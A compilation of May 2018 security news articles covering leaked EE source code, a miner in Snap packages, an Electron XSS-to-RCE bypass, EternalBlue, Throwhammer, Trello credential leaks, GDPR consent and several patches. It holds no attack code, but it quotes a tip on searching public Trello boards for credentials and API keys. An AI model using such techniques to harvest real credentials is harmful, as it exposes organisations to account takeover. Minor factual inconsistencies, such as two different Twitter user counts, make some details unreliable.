The disconcerting discovery was made by a security researcher that uses the Twitter handle of “six,” he found two million lines of code including access to the company’s private employee and developer APIs and Amazon Web Services secret keys.

“One of the largest mobile networks in Britain, EE, which is also owned by BT Group, was accused of risking the safety of a critical code repository due to bad security. Apparently, the company left the repository protected only by a default login info, according to one researcher.” reported the koddos.net website.

six
@lol_its_six
After waiting many many weeks for no reply, I have decided to let the public know, since @EE clearly do not care about security. EE has exposed over 2 million lines of private source code to their systems and employee systems, due to using an admin:admin user/pass combination - 1

6:02 PM - May 10, 2018
29
18 people are talking about this
Twitter Ads info and privacy

six
@lol_its_six
10 May
After waiting many many weeks for no reply, I have decided to let the public know, since @EE clearly do not care about security. EE has exposed over 2 million lines of private source code to their systems and employee systems, due to using an admin:admin user/pass combination - 1

six
@lol_its_six
Access to this allows malicious hackers to analyze source code and identify vulnerabilities within. Actually; there's no need, since you can just view the code and take AWS keys, API keys, and more. Also; pushing to prod with 167 vulnerabilities???? (MyEE-Web master) - 2 pic.twitter.com/jyLEBt2f0w

6:03 PM - May 10, 2018

13
See six's other Tweets
Twitter Ads info and privacy
The availability of the keys could be exploited by attackers to analyze the code of the employee’s payment systems and discover vulnerabilities to exploit for malicious purposes.

According to the researcher, payment information, including credit card data, is at risk.

six
@lol_its_six
10 May
Replying to @lol_its_six
Access to this allows malicious hackers to analyze source code and identify vulnerabilities within. Actually; there's no need, since you can just view the code and take AWS keys, API keys, and more. Also; pushing to prod with 167 vulnerabilities???? (MyEE-Web master) - 2 pic.twitter.com/jyLEBt2f0w

six
@lol_its_six
You trust these guys with your credit card details, while they do not care about security, or customer privacy. Picture below shows access keys to authorize to their employee tool, for customer lookups. pic.twitter.com/clG4wsFcAM

6:05 PM - May 10, 2018

5
See six's other Tweets
Twitter Ads info and privacy
The code was exposed on the SonarQube open source platform hosted on an EE subdomain that was used by the mobile network company to analyze code with the intent to bugs and security vulnerabilities on their website.

According to the researchers, he notified the data leak EE several times for weeks, but the company did not reply.

“After waiting many many weeks for no reply, I have decided to let the public know, since @EE clearly do not care about security. EE has exposed over two million lines of private source code to their systems and employee systems, due to using an ‘admin:admin’ user/pass combination,” six tweeted.

uk EE operator

A spokesman for the company contacted ZDNet criticized the research and his claims and tried to downplay the incident sustaining that none of the customer or payment data at risk.

According to the spokesperson later it is a development code that does not contain any information related to the production infrastructure

Anyway, the company had changed the password and that the service was taken offline.

“Our final code then goes through further checks, processes, and review from our security team before being published,” the spokesperson said. “This development code does not contain any information pertaining to our production infrastructure or production API credentials as these are maintained in separate secure systems and details are changed by a separate team.”

“We take the security of our customer data extremely seriously and would like to thank the researcher for bringing this issue to our attention. We’re conducting a thorough investigation to make sure this does not happen again,” the spokesperson told ZDNet.


Malicious package containing Bytecoin cryptocurrency miner found on the Ubuntu Snap Store
13.5.2018 securityaffairs
Virus  Cryptocurrency

An Ubuntu user has spotted a Bytecoin cryptocurrency miner hidden in the source code of an Ubuntu Snap Pack in the Official Ubuntu Snap Store.
An Ubuntu user that goes online with the GitHub moniker “Tarwirdur” has discovered a malware in the source code of an Ubuntu snap package hosted on the official Ubuntu Snap Store, a first analysis revealed that it is a cryptocurrency miner.

The malicious code was able to mine the Bytecoin (BCN) cryptocurrency, the account hardcoded in the malware is “myfirstferrari@protonmail.com.”

The malicious app is 2048buntu, it is a copycat of the legitimate of the 2024 game included as an Ubuntu snap.

2048buntu-game ubuntu snap store

Tarwirdur discovered the app contained a cryptocurrency mining application disguised as the “systemd” daemon, the package also includes an init script that allows gaining boot persistence on the target.

Tarwirdur reported his discovery to the maintainers at the Ubuntu Snap Store team that promptly removed the app. The user also noticed another app uploaded by the same developers and after a check, he discovered it also contained a malicious code and for this reason, it was removed too.

“At least two of the snap packages, 2048buntu and Hextris, uploaded to the Ubuntu Snaps Store by user Nicolas Tomb, contained malware. All packages by Nicolas have since been removed from the Ubuntu Snaps Store, “pending further investigations“.” states a post published on the website linuxuprising.com.

Currently, it is impossible to establish the number of affected users because the Ubuntu Snap Store does not provide an install count.

The problem is that submitted snaps do not go through a security check, this means that ill-intentioned can upload malicious snap packages to the Ubuntu Snap Store.


A new flaw in Electron poses a risk to apps based on the framework
13.5.2018 securityaffairs
Vulnerebility

Security experts have discovered a vulnerability in the Electron software framework that has been used for building a large number of popular desktop applications.
Popular desktop applications, including Skype, Slack, GitHub Desktop, Twitch, WordPress.com, and others, are potentially affected.

Electron is a node.js, V8, and Chromium open-source framework that allows developers to use web technologies such as JavaScript, HTML, and CSS to build desktop apps.

When building apps based on the Electron framework, developers can choose Electron API or the Node.js APIs and its modules.

Node.js APIs and built-in modules provide developers a wider integration with the OS and allow to access to more OS features.

In order to prevent the abuse of OS features, Electron team created a mechanism that prevents attacks on apps based on their framework.

“Electron applications are essentially web apps, which means they’re susceptible to cross-site scripting attacks through failure to correctly sanitize user-supplied input. A default Electron application includes access to not only its own APIs, but also includes access to all of Node.js’ built in modules.” reads the analysis published by Trustwave. “This makes XSS particularly dangerous, as an attacker’s payload can allow do some nasty things such as require in the child_process module and execute system commands on the client-side.”

Apps that run HTML and JS code on the desktop have the “nodeIntegration: false” option enabled by default, this implies that the access to the Node.js APIs and modules is disabled by default.

The WebView tag feature allows developers to embed content, such as web pages, into an Electron application and run it as a separate process.

“When using a WebView tag you are also able to pass in a number of attributes, including nodeIntegration. WebView containers do not have nodeIntegration enabled by default.” continues the analysis.

When webviewTag is set to false in a webPreferences config file the nodeIngration is also set to false, however, if developers don’t declare webviewTag, then the Electron app considers nodeIntegration set to false.

Trustwave researcher Brendan Scarvell discovered that is possible to turn the nodeIntegration option to “true” and allows a malicious application to access Node.js APIs and modules and abuse more OS features.

Scarvell explained that if the developers of an Electron-based app have not specifically set the “webviewTag: false” option inside webPreferences config file, an attacker can exploit a cross-site scripting (XSS) vulnerability inside an app to create a new WebView component window to change the settings and to set the nodeIngrationflag to “true.”

electron

The expert published proof-of-concept code that could be used by an attacker to exploit any XSS flaw and gain access to the underlying OS.

“If you find an Electron application with the nodeIntegration option disabled and it contains either an XSS vulnerability through poor sanitization of user input or a vulnerability in another dependency of the application, the above proof-of-concept can allow for remote code execution provided that the application is using a vulnerable version of Electron (version < 1.7.13, < 1.8.4, or < 2.0.0-beta.3), and hasn’t manually opted into one of the following:

Declared
webviewTag: false
in its webPreferences.
Enabled the nativeWindowOption option in its webPreferences.
Intercepting new-window events and overriding event.newGuest without using the supplied options tag.” continues the analysis.
Scarvell reported the vulnerability to Electron team that addressed it in March.


One Year After WannaCry Outbreak, EternalBlue Exploit Still a Threat
12.5.2018 securityweek
Exploit

One year after the WannaCry ransomware outbreak, the NSA-linked exploit used for propagation is still threatening unpatched and unprotected systems, security researchers say.

The WannaCry infection started on May 12, 2017, disrupting Spanish businesses and dozens of hospitals in the U.K. The malware hit Windows 7 the most and was estimated to have infected nearly half a million computers and other types of devices within 10 days.

The largest number of machines was hit in the first hours of the outbreak, before a security researcher discovered a kill-switch and slowed the spreading to a near stop.

“WannaCry served as a cybersecurity wake-up call for many organizations that were falling behind in their routine IT responsibilities,” Ken Spinner, VP of Field Engineering, Varonis, told SecurityWeek in an emailed comment.

“While WannaCry tore through organizations like the NHS, companies that kept their systems updated with the latest patches, performed backups and took proactive security measures emerged unscathed,” Spinner continued.

WannaCry was able to spread fast because it abused an exploit supposedly stolen from the National Security Agency-linked Equation Group. Called EternalBlue, the exploit was made public in April 2017, one month after Microsoft released a patch for it.

EternalBlue is targeting a vulnerability in Windows’ Server Message Block (SMB) on port 445, but only older operating system versions (mainly Windows XP and Windows 7) are impacted.

Although it brought the exploit to the spotlight, WannaCry wasn’t the first malware to abuse it. During the weeks prior to the outbreak, EternalBlue was leveraged by a crypto-currency mining botnet and a backdoor. A ransomware family called UIWIX was also observed abusing it around the same period.

Despite Microsoft releasing a couple of patches for the security flaw targeted by EternalBlue, including an emergency patch for unsupported systems, tens of thousands of systems continued to be vulnerable last summer.

WannaCry, which was supposedly the work of North Korean actors, managed to wreak havoc a year ago, but it died fast. EternalBlue, on the other hand, remained strong, and was also abused in the global NotPetya attack last year.

In fact, security researchers say that the NSA-linked exploit is currently more popular among cybercriminals than it was a year ago.

Overall, more than 2 million users were observed being hit via the exploit from May 2017 to May 2018, Moscow-based security firm Kaspersky Lab told SecurityWeek.

The number of unique users hit by EternalBlue was 10 times higher in April 2018 compared to May 2017, with an average of more than 240,000 users being attacked via this exploit every month, the security firm also said.

“The fact that hackers keep targeting users using the EternalBlue exploit in their attacks means that many systems remain unpatched, which could lead to some dangerous consequences. It’s still highly important for organizations to take a close look at the security of their networks. Their first priority should be to install all necessary patches on time, in order to avoid losses in the future,” said Anton Ivanov, lead malware analyst, Kaspersky Lab.

According to ESET, not only did the popularity of EternalBlue increase significantly over the past months, but a “recent spike even surpassed the greatest peaks from 2017.”

Following a calmer period after the WannaCry attack, when only hundreds of detections were observed daily, the use of EternalBlue started picking up pace in September last year and reached new heights in mid-April 2018.

A Satan ransomware campaign observed last month likely contributed to the latest spike, but the exploit might have been used in other malicious activities as well, the researchers say.

“This exploit and all the attacks it has enabled so far highlight the importance of timely patching as well as the need for a reliable and multi-layered security solution that can block the underlying malicious tool,” ESET points out.

The main reason EternalBlue’s usage is spiking is the existence of millions of vulnerable devices that continue to be exposed to the Internet, as Mounir Hahad, head of Juniper Threat Labs at Juniper Networks, told SecurityWeek.

“Immediately after the WannaCry epidemic last year, most security researchers advised people to disable SMBv1 entirely and make sure SMBv2 was not exposed to the internet. One year later and we are still seeing about 2.3M devices with SMBv1 exposed to the internet, with the majority of these vulnerable machines in the UAE, US, Russia, Taiwan and Japan,” Hahad said.

"The same mitigation techniques that have been recommended over and over again are still relevant and effective to minimize the impacts of a ransomware attack, but it comes down to actually implementing them,” Hahad continued.


Throwhammer, the new Rowhammer attack to remotely hack systems over the LAN
12.5.2018 securityaffairs
Attack

Security experts devised a new attack technique dubbed Throwhammer that could be exploited by attackers to launch Rowhammer attack on a system in a LAN.
A few days ago we discussed the GLitch attack that leverages graphics processing units (GPUs) to launch a remote Rowhammer attack against Android smartphones.

Now security experts devised a new attack technique dubbed Throwhammer that could be exploited by attackers to launch Rowhammer attack on a system just by sending specially crafted packets to the vulnerable network cards over the local area network.

Rowhammer is classified as a problem affecting some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows, this means that theoretically, an attacker can change any value of the bit in the memory.

The issue has been known at least since 2012, the first attack was demonstrated in 2015 by white hat hackers at Google Project Zero team.

In October 2016, a team of researchers in the VUSec Lab at Vrije Universiteit Amsterdam devised a new method of attack based on Rowhammer, dubbed DRAMMER attack, that could be exploited to gain ‘root’ access to millions of Android smartphones and take control of affected devices.

The new technique was devised by the same team of researchers that proposed the previous ones, a group of experts from the Vrije Universiteit Amsterdam and the University of Cyprus.

This time the researchers demonstrated that sending malicious packets over LAN it is possible to implement a Rowhammer attack on systems running Ethernet network cards equipped with Remote Direct Memory Access (RDMA). Such kind of configuration is widely adopted in cloud infrastructure and data centers.

throwhammer

The RDMA feature is used by network cards to allow computers in a network to exchange data (with read and write privileges) directly to the main memory. The researchers demonstrated that it is possible to abuse this feature to perform access to the target memory in rapid succession triggering bit flips on DRAM.

Researchers explained that the Throwhammer attack requires a high-speed network of at least 10Gbps to trigger a bit flip through hundreds of thousands of memory accesses to specific DRAM locations within tens of milliseconds.

“Specifically, we managed to flip bits remotely using a commodity 10 Gbps network. We rely on the commonly-deployed RDMA technology in clouds and data centers for reading from remote DMA buffers quickly to cause Rowhammer corruptions outside these untrusted buffers.” reads the research paper published by the experts.

“These corruptions allow us to compromise a remote memcached server without relying on any software bug”

According to the paper, the experts were able to observe bit flips accessing memory 560,000 times in 64 ms (roughly 9 million accesses per second) over LAN to its RDMA-enabled network card.

“Even regular 10 Gbps Ethernet cards can easily send 9 million packets per second to a remote host that end up being stored on the host’s memory.” continues the paper.

“Might this be enough for an attacker to effect a Rowhammer attack from across the network? In the remainder of this paper, we demonstrate that this is the case and attackers can use these bit flips induced by network traffic to compromise a remote server application.”

Let me remind you that the Rowhammer technique exploits a computer hardware weakness, this means that it is not possible to use software patch to mitigate it.

Experts explained that disable RDMA to mitigate the attack is effective but nor not realistic, therefore, they presented some solutions such as ALIS, a custom allocator that isolates a vulnerable RDMA buffer.

Technical details for the Throwhammer attack are available in the paper published by the experts and titled “Throwhammer: Rowhammer Attacks over the Network and Defenses.”


Chrome 66 Update Patches Critical Security Flaw
11.5.2018 securityweek
Vulnerebility

An updated version of Chrome 66 is now available, which addresses a Critical security vulnerability that could allow an attacker to take over a system.

A total of 4 security vulnerabilities were addressed in the latest browser release, three of which were reported by external researchers.

The most important of the vulnerabilities are two High severity flaws that chain together to result in a sandbox escape. The issues include CVE-2018-6121, a privilege escalation in extensions, and CVE-2018-6122, a type confusion in V8.

The vulnerability chain was reported by an anonymous researcher on April 23. Google hasn’t published information on the flaw, but it appears that a remote attacker could exploit it to take control of vulnerable systems.

Another vulnerability resolved in the new browser iteration is CVE-2018-6120, a heap buffer overflow in PDFium reported by Zhou Aiting of Qihoo 360 Vulcan Team. The security researcher received a $5,000 reward for the finding.

The updated browser is available for download as version 66.0.3359.170 for Windows, Mac, and Linux devices.

This is the second time Google patches a Critical bug in Chrome 66 since the browser’s release in the stable channel less than a month ago.

In late April, the Internet giant addressed a use-after-free in Media Cache that could be exploited by a malicious actor to cause denial of service and possibly execute arbitrary code. The bug was reported by security researcher Ned Williamson, who received a $10,500 reward for the discovery.

The first stable release of Chrome 66 arrived with fixes for 62 security vulnerabilities, including two use after free in Disk Cache rated Critical severity (CVE-2018-6085 and CVE-2018-6086). Both issues were reported by Ned Williamson.


Panda Banker Campaign Hits U.S. Banks
11.5.2018 securityweek
Virus

Recently detected campaigns using the Panda Banker malware are targeting financial institutions worldwide, with those in the United States taking the largest hit, F5 reports.

First seen in 2016, Panda is based on the leaked source code of the infamous Zeus banking Trojan and has been involved in multiple infection campaigns globally. Sold as a kit on underground forums, the malware uses man-in-the-browser and webinjects to steal user credentials.

Historically, the threat has been targeting financial institutions in Italy, Canada, Australia, Germany, the United States, and the United Kingdom, but also started focusing on Japan earlier this year.

Now, F5 reports that, while Japan continues to be hit, the malware is also targeting users in the United States, Canada, and Latin America.

In February, the malware was targeting financial services and cryptocurrency sites in Italy with screenshots rather than webinjects, likely “to document and spy on user interaction at cryptocurrency accounts.”

In May, three different Panda Banker campaigns were observed, each focused on another geography.

One of them, F5 reports, hit 8 industries in North America, with 78% of the targets being US financial organizations. Canadian financial organizations, cryptocurrency sites, global social media providers, search and email providers, payroll, entertainment, and tech providers were also targeted.

“This campaign is also targeting major social media platforms like Facebook and Instagram, as well as messaging apps like Skype, and entertainment platforms like Youtube. Additionally, Panda is targeting Microsoft.com, bing.com, and msn.com,” F5 reports.

The same Panda botnet, marked as 2.6.8, is targeting Japanese financials as well. For that, however, the malware authors removed the Content Security Policy (CSP) headers, a security standard for preventing cross-site scripting (XSS), clickjacking and other injection attacks that could lead to the execution of malicious code from an otherwise trusted site.

This campaign also targets Amazon, YouTube, Microsoft.com, Live.com, Yahoo.com, and Google.com (likely targeting email accounts), along with Facebook and Twitter, and a couple of adult sites.

A third parallel campaign is hitting Latin America, focused on banks in Argentina, Columbia, and Ecuador, and the same social media, search, email, entertainment, and tech provider as the other attacks.

“This act of simultaneous campaigns targeting several regions around the world and industries indicates these are highly active threat actors, and we expect their efforts to continue with multiple new campaigns coming out as their current efforts are discovered and taken down,” F5 concludes.


UK Regulator Issues Advice on 'Consent' Within GDPR
11.5.2018 securityweek Privacy

The UK's Information Commissioners Office (ICO -- the data protection regulator) has published detailed guidance (PDF) on 'consent' within the General Data Protection Regulation. Since the UK is still in the European Union, the document provides a reasonable analysis of what is one of the trickiest aspects of GDPR. Once the UK leaves the EU, GDPR within the UK will be replaced by the new Data Protection Bill, which is designed to ensure the UK's data protection adequacy. It is not guaranteed to succeed in this.

Consent is not the only legal basis for processing personal data under GDPR. Others are a contractual relationship; compliance with a separate legal obligation; a public task; vital interest (as in, to save a life); and legitimate interests. Some of these are nuanced and may require detailed legal advice before being relied upon -- 'legitimate interests' does not mean that any commercial enterprise can ignore consent in the pursuit of profit.

GDPR in United Kingdom after BrexitNevertheless, user consent is likely to be the primary legal justification for processing user data. Under GDPR, it is not very different to the existing requirement for consent under the European Data Protection Directive (DPD), but adds a few significant aspects. In particular, it requires that consent must be 'unambiguous' and involve 'a clear affirmative action'.

The GDPR expansion of consent comes not in the definition but in the use and implications of consent. Three key areas are the need for keeping records of consent; the user's right to withdraw consent; and the inability to make consent a condition of a contract. "In essence," says the ICO, "there is a greater emphasis in the GDPR on individuals having clear distinct ('granular') choices upfront and ongoing control over their consent."

Genuine and lawful consent becomes a double-edged sword. On the one hand, it gives the user greater control over the use of his or her data (for example, the 'right to be forgotten' and the right to data portability); while on the other hand, the ICO says that explicit consent "can legitimize automated decision-making, including profiling."

However, it is the way the additional consent requirements play upon the definition of consent that can introduce confusion. An obvious example -- which has always existed but is now brought into focus by the potential size of the new GDPR fines -- involves 'freely given'. Consent cannot be freely given if there is imbalance in the relationship between the individual and the controller. "This will make consent particularly difficult for public authorities and for employers, who should look for an alternative lawful basis where possible," warns the ICO.

In general, public authorities should rely on the 'public task' justification rather than the consent justification. Employers who wish to process information on staff must be wary of any implication that continued employment might depend upon their consent to the processing -- that consent cannot be freely given and any reliance by the employer on that consent would be illegal.

The right to be forgotten is another complication. The implication of the regulation is that if, for any reason, the user cannot withdraw consent, or the data cannot be deleted, then consent was never legally given. Under such circumstances, user consent is most likely the wrong justification. The ICO uses a credit card company as an example. The company might ask for the user's consent to send details to a credit reference agency.

"However," says the ICO, "if a customer refuses or withdraws their consent, the credit card company will still send the data to the credit reference agencies on the basis of 'legitimate interests'. So, asking for consent is misleading and inappropriate -- there is no real choice." In this instance, the 'legitimate interests' justification should have been used from the outset -- not user consent.

The inability to use consent as a contract condition is another nuanced area that could lead to confusion. "If you require someone to agree to processing as a condition of service," says the ICO, "consent is unlikely to be the most appropriate lawful basis for the processing. In some circumstances it won't even count as valid consent."

The example given concerns a cafe that decides to offer its customers free wifi if they provide their name, email address and mobile phone number and then agree to the cafe's terms and conditions. The T&Cs make it clear that the details will be used for direct marketing. "The cafe is therefore making consent to send direct marketing a condition of accessing the service. However, collecting their customer's details for direct marketing purposes is not necessary for the provision of the wifi. This is not therefore valid consent."

If the consent issue sounds complex and confusing, it is because it is complex and confusing. For example, probably every reader will have received emails from companies seeking to gain 're-consent' to continue sending marketing or other emails before GDPR comes into effect. One example received here simply says, "To comply with the new EU General Data Protection Regulation (GDPR), we need to confirm that you want to keep receiving our marketing emails. Please confirm your subscription to [our firm's] marketing communications by clicking the button below." (Incidentally, beware of similar but false phishing emails.)

The reality is that such emails are either unnecessary or illegal. If the original consent was properly acquired in the first case, it will almost certainly remain valid. If consent was either not or inappropriately gathered in the first place, then this email is inadequate for GDPR's requirements. At just one very simple and basic level, it doesn't inform the reader of the right to withdraw consent; and is consequently not valid consent.

A case in point is the £13,000 fine levied by the ICO on Honda Motor Europe Ltd. The ICO announced in March 2017, "A separate ICO investigation into Honda Motor Europe Ltd revealed the car company had sent 289,790 emails aiming to clarify certain customers' choices for receiving marketing."

Honda believed it was doing so to abide by GDPR -- but in fact it was breaching the consent requirements of a separate law (the Privacy and Electronic Communication Regulations -- PECR), "The firm believed the emails were not classed as marketing but instead were customer service emails to help the company comply with data protection law. Honda couldn't provide evidence that the customers had ever given consent to receive this type of email, which is a breach of PECR. The ICO fined it £13,000."

At around the same time, the ICO fined the British Flybe airline £70,000 for sending more than 3.3 million emails to people who had told them they didn't want to receive marketing emails from the firm. Steve Eckersley, ICO Head of Enforcement, said at the time, "Both companies sent emails asking for consent to future marketing. In doing so they broke the law. Sending emails to determine whether people want to receive marketing without the right consent, is still marketing and it is against the law."

These fines, had they been levied under GDPR after 25 May 2018, could have been considerably higher.

The document published by the ICO is long and complex, but full of links for further information and examples of valid and invalid use of user consent. Getting consent wrong could be costly -- but getting it right is beneficial. "The GDPR sets a high standard for consent. Consent means offering people genuine choice and control over how you use their data," says the ICO. "When consent is used properly, it helps you build trust and enhance your reputation."


Rockwell Automation Patches Flaws in Simulation, Licensing Tools
11.5.2018 securityweek
Vulnerebility

Rockwell Automation has released updates for its Arena and FactoryTalk Activation Manager products to address various types of vulnerabilities, including a critical flaw that can allow remote code execution.

Both ICS-CERT and Rockwell Automation have released advisories describing the security holes and mitigations, but the vendor's advisories are only available to registered users.

FactoryTalk Activation Manager, a tool designed for managing licensed content and activating Rockwell software products, uses the Wibu-Systems CodeMeter and FlexNet Publisher license management applications.

Wibu-Systems CodeMeter is affected by a cross-site scripting (XSS) vulnerability that can be exploited to inject arbitrary code via a field in a configuration file, allowing attackers to access sensitive information or alter the impacted HTML page. The issue is tracked as CVE-2017-13754 and is considered low severity.

FlexNet Publisher, on the other hand, is affected by a critical buffer overflow (CVE-2015-8277) that can allow a remote attacker to execute arbitrary code.

"A custom string copying function of Imgrd.exe (the license server manager in FlexNet Publisher) and flexsvr.exe does not use proper bounds checking on incoming data, potentially allowing a remote, unauthenticated user to send crafted messages with the intent of causing a buffer overflow," Rockwell said in its advisory.

The vulnerabilities impact FactoryTalk Activation Manager 4.00.02 and 4.01, which include Wibu-Systems CodeMeter v6.50b and earlier, and FactoryTalk Activation Manager v4.00.02 and earlier, which include FlexNet Publisher v11.11.1.1 and earlier.

FactoryTalk Automation Manager is used by more than two dozen Rockwell products – users can consult a list provided by the vendor and ICS-CERT to see if they are affected. Updating Automation Manager to version 4.02 patches the vulnerabilities. Alternatively, CodeMeter can be updated to a compatible version.

Separate advisories published recently by Rockwell and ICS-CERT describe a medium severity denial-of-service (DoS) vulnerability affecting Arena, a simulation software for the manufacturing sector. Arena is designed to help organizations identify process bottlenecks, evaluate process changes, improve logistics, and increase throughput.

Researcher Ariele Caltabiano informed Rockwell through Trend Micro’s Zero Day Initiative (ZDI) that Arena is affected by a use-after-free vulnerability that can be exploited to crash the software by convincing the targeted user to open a specially crafted file. Crashing the application could lead to the user losing unsaved data.

Rockwell says the flaw, tracked as CVE-2018-8843, affects Arena Simulation Software for Manufacturing versions 15.10.00 and earlier, and it has been patched with the release of version 15.10.01.


Mining passwords from dozens of public Trello boards
11.5.2018 securityaffairs Hacking

Trello, when an error in the publishing strategy is able to put at risk the private data of a huge community of unaware users.
A “Security enthusiastic” found a vulnerability in the Trello web management and now with a simple dork is possible to query to mine passwords from dozens of public Trello boards.

trello 2

Our story begins form @Trello Twitter account where we read:

“Trusted by millions, Trello is the visual collaboration tool that creates a shared perspective on any project.” Yes, “trusted by millions”: but those millions probably didn’t understand the meaning “Public” of the Trello Boards, which they used as “Private” space while they are not.

In fact now, even trusting Trello, millions of users risk having their personal data exposed – including credential, private information, reserved information of their projects. In fact, they are now, while we are writing, having they sensitive data exposed on the Internet, thanks to a dork that can be easily used with Google.

The author of the discovery is Kushagra Pathak who talks about him as a Cyber-security enthusiast in his Twitter profile @xKushagra and has reported this incredible research written in his truly amazing blog post.

A few days ago, as he says, while researching a Bug Bounty program for Jiira with a simple dork like this:

trello 3

has, inputting “trello.com” in the [company_name] place, made an amazing discovery: Google query returns Trello Boards where are published every kind of information.

Giving a better look at the results he “found that a lot of individuals and companies are putting their sensitive information on their public Trello Boards.”. Yes, it’ amazing but happened: what kind of information they have put on the Trello Boards? “Information like unfixed bugs and security vulnerabilities, the credentials of their social media accounts, email accounts, server and admin dashboards”, all this has been indexed by all the search engines so they can easily find them. He twitted this
trello 3

Kushagra Pathak
@xKushagra
#bugbountytip #osint: Search for public Trello boards of companies, to find login credentials, API keys, etc. or if you aren't lucky enough, then you may find companies' Team Boards sometimes with tasks to fix security vulnerabilities

11:30 AM - Apr 25, 2018
178
83 people are talking about this
Twitter Ads info and privacy
So digging in the details he “went on to modify the search query to focus on Trello Boards containing the passwords for Gmail accounts.”

With this simple dork the result was really incredible:

Many passwords in clear were repowered by Google as shown in the following figure.

So Trello Boars have been under a huge misunderstanding: they were “Public” borders not Private ones, but their users didn’t know it, or they didn’t consider it.

Then some user used the public Trello Boards as “as a fancy public password manager for their organization’s credentials.”, as Kushagra Pathak writes.

Then every kind of the search is then possible: by email (AoL, Yahoo, Mail.com) by protocol (SSH, FTP), everything is possible to search even business emails, social media accounts, website analytics, Stripe, AdWords accounts.

At this point, I have contributed to spread the info around the world.

Odisseus
@_odisseus
#Trello is an online tool for managing projects and personal tasks and with a dork is possible to exfiltrate business emails, Jira credentials, and sensitive internal information of Bug Bounty Programs.
Via @xKushagra https://medium.freecodecamp.org/discovering-the-hidden-mine-of-credentials-and-sensitive-information-8e5ccfef2724 …

9:18 AM - May 11, 2018
132
109 people are talking about this
Twitter Ads info and privacy
Kushagra Pathak has also discovered almost than 25 Companies were leaking very sensitive information and, as a proven Ethical Hacker, he reported quickly the Trello vulnerability to them, facing a very tedious and challenging task.

The only ironic side of this story is that to find the right person or the right contact mail it has been easy: they were all on the Trello Boards.

There is a less ironic thing: what about the Bug Bounty? Our hero, who discovered this vulnerable, has found among the exposed companies one company running a Bug Bounty Program, but he hasn’t be rewarded at all: “Unfortunately, they didn’t reward me because it was an issue for which they currently don’t pay”, he said.


Self-destructing messages received on 'Signal for Mac' can be recovered later
11.5.2018 thehackernews Apple

It turns out that macOS client for the popular end-to-end encrypted messaging app Signal fails to properly delete disappearing (self-destructing) messages from the recipient's system, leaving the content of your sensitive messages at risk of getting exposed.
For those unaware, the disappearing messages in Signal self-destruct after a particular duration set by the sender, leaving no trace of it on the receiver's device or Signal servers.
However, security researcher Alec Muffett noticed that the messages that are supposed to be "disappearing" can still be seen—even if they are deleted from the app.
Another security researcher Patrick Wardle reproduced the issue and explained that macOS makes a copy (partial for long messages) of disappearing messages in a user-readable database of macOS's Notification Center, from where they can be recovered anytime later.
If you want to keep an on your incoming messages without having to check your inbox obsessively, macOS desktop notifications (banners and alerts) that appear in the upper-right corner of your screen is a great way to alert you of things you don't want to miss.

According to a blog post published by Wardle, if you have enabled notifications for Signal app, the service will show you notifications for the disappearing messages as well in the form of truncated messages (which is generally 1-1.5 lines of the full message).
Now, sharing incoming disappearing messages with the notification system leads to two privacy issues:
"Disappearing" messages may remain in the User Interface of macOS Notification Center even after being deleted within the Signal app and can be seen in the notification bar until manually closed by the user.
In the backend, the SQLite database of Notification Center also keeps a copy of truncated messages, which can be accessed with normal user permissions, or by a malicious app installed on the system.
Wardle suggests either Signal should not provide notifications service for disappearing messages or should explicitly delete such notifications from the system’s database when it removes the messages from the app UI.
Meanwhile, to protect the content of your sensitive messages so that no malicious app, hacker or your wife can recover them, you should consider disabling notifications service until Signal patches this issue.


Microsoft Issues Emergency Patch For Critical Flaw In Windows Containers
11.5.2018 thehackernews
Vulnerebility

Just a few days prior to its monthly patch release, Microsoft released an emergency patch for a critical vulnerability in the Windows Host Compute Service Shim (hcsshim) library that could allow remote attackers to run malicious code on Windows computers.
Windows Host Compute Service Shim (hcsshim) is an open source library that helps "Docker for Windows" execute Windows Server containers using a low-level container management API in Hyper-V.
Discovered by Swiss developer and security researcher Michael Hanselmann, the critical vulnerability (tracked as CVE-2018-8115) is the result of the failure of the hcsshim library to properly validate input when importing a Docker container image.
This, in turn, allows an attacker to remotely execute arbitrary code on the Windows host operating system, eventually letting the attacker create, remove, and replace files on the target host.
As Hanselmann explained in his personal blog, "Importing a Docker container image or pulling one from a remote registry isn't commonly expected to make modifications to the host file system outside of the Docker-internal data structures."
Hanselmann reported the issue to Microsoft in February this year, and the tech giant fixed the vulnerability a few days before this month’s patch Tuesday by releasing an updated version of hcsshim.
Although the vulnerability has been assigned a critical severity rating, Microsoft says exploitation of this issue is unlikely.
"To exploit the vulnerability, an attacker would place malicious code in a specially crafted container image which, if an authenticated administrator imported (pulled), could cause a container management service utilizing the Host Compute Service Shim library to execute malicious code on the Windows host," Microsoft says in its advisory.
The patch for this vulnerability addresses the way hcsshim validates input from Docker container images, therefore blocking the loading of malicious code in specially crafted files.
An updated version 0.6.10 of the Windows Host Compute Service Shim (hcsshim) file is available right now for download from GitHub.
Full details of the vulnerability have not been released yet, but Hanselmann promises to publish in-depth technical details and a proof-of-concept exploit for the flaw on May 9, following an agreement with Microsoft security response center.
Microsoft's May 2018 Patch Tuesday has been scheduled for release on May 8.


Change Your Twitter Password Immediately, Bug Exposes Passwords in Plaintext
11.5.2018 thehackernews
Social

Twitter is urging all of its 330 million users to change their passwords after a software glitch unintentionally exposed its users' passwords by storing them in readable text on its internal computer system.
The social media network disclosed the issue in an official blog post and a series of tweets from Twitter Support.


According to Twitter CTO Parag Agrawal, Twitter hashes passwords using a popular function known as bcrypt, which replaces an actual password with a random set of numbers and letters and then stored it in its systems.
This allows the company to validate users' credentials without revealing their actual passwords, while also masking them in a way that not even Twitter employees can see them.

However, a software bug resulted in passwords being written to an internal log before completing the hashing process—meaning that the passwords were left exposed on the company's internal system.
Parag said Twitter had found and resolved the problem itself, and an internal investigation had found no indication of breach or passwords being stolen or misused by insiders.
"We found this error ourselves, removed the passwords, and are implementing plans to prevent this bug from happening again," Parag said.


"We are very sorry this happened. We recognize and appreciate the trust you place in us, and are committed to earning that trust every day."
Still, the company urged all of its 363 Million users to consider changing their passwords to be on a safer side.
How to Reset Twitter Password
In order to change your password on Twitter, click on your Profile Picture icon given in the top-right corner, then go to Settings and Privacy → Password. Now, type your current password, and enter a new one, and try keeping it stronger.
For the Twitter app for iOS and Android, click on your Profile Picture icon in the top-left corner, and then go to Settings and Privacy → Account → Change Password ("Password" on Android), and create a new, stronger password.
You should also change the password on all other services where you have used the same password.
You are also advised to enable two-factor authentication service on Twitter, which adds an extra layer of security to your account and help prevent your account from being hijacked.


